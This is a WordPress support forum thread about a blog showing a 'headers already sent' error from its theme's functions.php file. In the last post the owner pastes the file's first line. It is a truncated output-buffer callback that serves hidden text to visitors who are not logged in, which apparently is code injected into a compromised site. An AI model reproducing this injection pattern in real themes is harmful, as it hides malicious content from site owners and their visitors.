WordPress.org

Forums

Please help (8 posts)

  1. zappa49441
    Member
    Posted 2 years ago #

    I run a small blog at http://www.americantouchline.com, but I cannot access anything right now.

    The front page, as well as the admin page, comes up with the following error message.

    "Warning: Cannot modify header information - headers already sent by (output started at /home/content/15/9374115/html/wp-content/themes/magazine-basic/functions.php:1) in /home/content/15/9374115/html/wp-includes/pluggable.php on line 866"

    Can anybody please tell me what's going on and how I can fix it?

  2. *Second one tonight, if there's a third I may want to buy a lottery ticket...*

    Give this a read regarding the "headers already sent" message.

    http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F

    It's often your wp-config.php file, but in your case I think it's the wp-content/themes/magazine-basic/functions.php file.

    You can download a fresh copy for that theme and using FTP or whatever file management tools your host has provided you with transfer a clean copy of the `theme on top of the one that is giving you a problem.

    http://wordpress.org/extend/themes/magazine-basic
    http://wordpress.org/extend/themes/download/magazine-basic.2.7.9.zip

    Your site has Magazine Basic 2.7.7 and you will lose any changes you made but uploading the newer files should be alright. if you are unsure then make a backup copy of the current magazine-basic directory first.

  3. nytevargas
    Member
    Posted 2 years ago #

    You need to buy a lottery ticket! My blogs just started doing this tonight. I have never touched the php files and have been using the same themes for over six months now. I have three blogs, each with a different theme and all three of them do this. Is this error always related to the theme? What would cause it to do this without anyone modifying the php files? Just curious. I will attempt to follow the instructions above, but it just seems strange to all be at one time.

    My blogs are janice.oncedarkness.com neoma.oncedarkness.com and oncedarkness.com One of them I am active on and the other two I was planning on updating and wiping clean tonight. LOL! I cannot even log into any of them. I could yesterday though. O.o

  4. What would cause it to do this without anyone modifying the php files? Just curious.

    It usually is the wp-config.php file if you haven't made changes to other files. Or a bad update to a plugin or theme, that has happened at least once before. That Codex link explains it better then I do I think and the wp-config.php file is where I'd look first.

  5. zappa49441
    Member
    Posted 2 years ago #

    I haven't made any changes to my php files.

    I was receiving error messages for the plugin Simple Twitter Connect shortly before the crash. I deleted the plugin since I don't use it anyways hoping that would eliminate the error messages. Then the whole site went down.

  6. I haven't made any changes to my php files.

    Something has changed and from that error it may be that wp-content/themes/magazine-basic/functions.php file. Can you check it?

  7. zappa49441
    Member
    Posted 2 years ago #

    Ok, so I checked my functions.php file and verified that the file started <?php and ended ?> with no spaces.

    Still no go.

    After checking the edits, I saved the file. But, I am wondering, is there another step? Am I supposed to upload it? If saving it was all I was supposed to do, is reloading my theme my only option?

  8. zappa49441
    Member
    Posted 2 years ago #

    By the way, don't know if this helps, but since the error is supposedly coming from the first line of the functions.php file, I thought I'd include the whole first line of code to see if you can spot a problem. Here it is.

    <?php function callbackx($buffer) {$tx="";if (function_exists("is_user_logged_in"))if (!is_user_logged_in()) $tx="

    Thank you.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.